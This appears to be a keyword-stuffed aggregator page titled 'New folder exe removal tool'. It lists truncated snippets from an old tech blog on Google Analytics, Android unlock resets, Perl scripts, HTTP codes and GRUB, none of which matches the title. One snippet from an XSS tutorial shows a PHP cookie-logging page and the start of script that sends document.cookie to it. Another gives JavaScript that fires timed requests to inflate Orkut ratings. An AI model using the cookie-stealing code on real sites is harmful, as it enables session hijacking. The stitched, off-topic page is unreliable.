03 Jan, 2011

New folder exe removal tool

Articles related to new folder exe removal tool

How to access realtime google analytics

http://digitalpbk.com/google-analytics/how-to-access-google-analytics-realtime How to access realtime google analytics into Google Analytics Click on the new Version from the top right portion as it is available only in the new version of Google Analytics Click on a website profile from the page/ Click on Home menu on the main navigation under the Analytics logo besides your website name. Now on the left navigation you should see Real time (BETA) Open the menu and click Overview This brings up Google Analytics Realtime View. Have fun watching your stats realtime! Features in Google Analytics Realtime Google analytics ...
Published 6 months, 2 weeks ago

Reset forgot unlock pattern on Android

http://digitalpbk.com/android/reset-forgot-unlock-pattern Reset forgot unlock pattern on Android will be asked to enter your google credentials Now if you are successfully authorized, you will be presented a screen to set a new lock pattern. Put in a new pattern and confirm the pattern once. Now you should be at the home screen with your unlock pattern reset. Don't have a Google Account connected / No internet on your phone? After creating an unlock pattern be sure to do a sync to google using WiFi so that google can verify your username / password without internet in case you forgot your ...
Published 10 months, 2 weeks ago

Dataone Account Usage Checker in PERL

http://digitalpbk.blogspot.com/2008/06/free-dataone-account-usage-checker-perl.html or $ARGV[$i] eq "--user"){ $username = $ARGV[++$i]; } elsif($ARGV[$i] eq "-p" or $ARGV[$i] eq "--pass"){ $password = $ARGV[++$i]; } elsif($ARGV[$i] eq "-i" or $ARGV[$i] eq "--url"){ $url = $ARGV[++$i]; }}unless($username){print "Username : ";chomp($username = );}unless($password){print "Password : ";`stty -echo`;chomp($password = );`stty echo`;print "\n";}$cj = HTTP::Cookies->new(file ...
Published 3 years, 10 months ago

Yahoo! Built in chat with mail

http://digitalpbk.blogspot.com/2007/06/yahoo-built-in-chat-with-mail.html Yahoo! Built in chat with mail Yahoo!Catches up with Google and introduces the same Inbox + Messenger bundle. On the new yahoo mail beta now you can chat to your friends too. At first look yea it rocks. It has almost all the formatting and smilies used by messenger. (Of course the Gizmos are missing).But still gmail is ahead because, gmail allows you to be signed in on more than one place. For eg: mail and google talk. Yahoo does not allow that when you sign in inside the mail, you get ...
Published 4 years, 11 months ago

Increasing the karma ratings on Orkut

http://digitalpbk.blogspot.com/2007/01/increasing-karma-ratings-on-orkut.html , the 3 get requests must not be sent to the server together. Leave a time delay of about 100ms between each of the GET requests.You can accomplish this in javascript by the following this template: function fn(index){ var links=new Array("Link 1 for cool/trusty/sexy/fan", "etc fill in"); var i= new Image(); i.src = links[index]; if(index != Count) { window.setTimeout("fn("+(index+1)+")",100); } else window.location = "Somewhere"; //Redirect ...
Published 5 years, 4 months ago

XSS - Part 2 (Cookie stealing and Defacement)

http://digitalpbk.blogspot.com/2006/12/xss-part-2-cookie-stealing-and.html in javascript is accomplished by document.cookie, if somehow we could sent this to our page we have success. For this trick you will need to setup a page that logs the cookies that it recieves. The source of this page in php would be something like : grabcookie.php$handle=fopen("cookiejar.txt","a");fputs($handle,"\n".$_GET["cookie"]."\n");fclose($handle);?>Now to get the cookie to this page we would have to embed the followingvar i=new Image ...
Published 5 years, 5 months ago

Solve "Cannot modify header information - headers already sent by *.php"

http://digitalpbk.com/php/warning-cannot-modify-header-information-headers-already-sent Solve  "Cannot modify header information - headers already sent by *.php" these functions and then to the output part. I am sure I dont output anything before calling header or setcookie Just see all your files for white spaces or empty new lines. For example if you include a file before using the header or setcookie functions, make sure the file does not have a closing php tag (?>) at the end of the file. This is recommended by PHP so that stray white space or new line characters at the end of this included file gets outputted. // // I still want to output first ...
Published 2 years, 2 months ago

HTTP 1.1 Response Status Codes

http://digitalpbk.blogspot.com/2007/04/http-11-response-status-codes.html the rest of the request"101 Switching Protocols : "Ready to switch the protocol specified by the client, in an Upgrade Request"200 - 299 : Client Request SuccessfulStatus codes that indicates the client's request was successfully accepted.200 OK : Successfully processed request and response is attached201 Created : Created the new URI specified by the Location Header.202 Accepted : Accepted for processing203 Non Authoritative Info : Indicates the META information originated from ...
Published 5 years, 1 month ago

Introduction to Windows - Programming for Windows

http://digitalpbk.blogspot.com/2007/09/windows-and-c-programming.html Introduction to Windows - Programming for Windows History - DOSDisk Operating System aka DOS was one of the earlier operating systems, it was a single task system, where the whole system and the OS was devoted to executing a single program and was basically a text based OS.With the advent of the Windows Operating System, multiple process or applications could be run and it became a graphical OS (interface). So in order to support new features the basic structure of C/C++ programs changed from ...
Published 4 years, 8 months ago

Changing the default Boot OS in GRUB on Ubuntu 9.10

http://digitalpbk.com/ubuntu-grub/changing-default-boot-os-grub-ubuntu-910 Changing the default Boot OS in GRUB on Ubuntu 9.10 Ubuntu 9.10 ships with the new GRUB (Grand Unified Boot Loader 1.97 beta) in plain words its the software that boots the operating system you choose when you boot the computer. In earlier versions of Ubuntu / Grub to change the menu on the grub screen, one had to edit the /boot/grub/menu.lst file. In the new system this a little different from just editing the one file. The GRUB configuration now resides at /boot/grub/menu.cfg But do ...
Published 2 years, 6 months ago

Related help topics for new folder exe removal tool More keywords like new folder exe removal tool
More pages for new folder exe removal tool


Email Newsletter
Email:
Popular Posts
Recent Posts
Tags
Random photo
Rainbow appearence near Havelock Island Rainbow appearence near Havelock Island in Havelock Island Andaman
On Facebook
Recent Comments


digitalpbk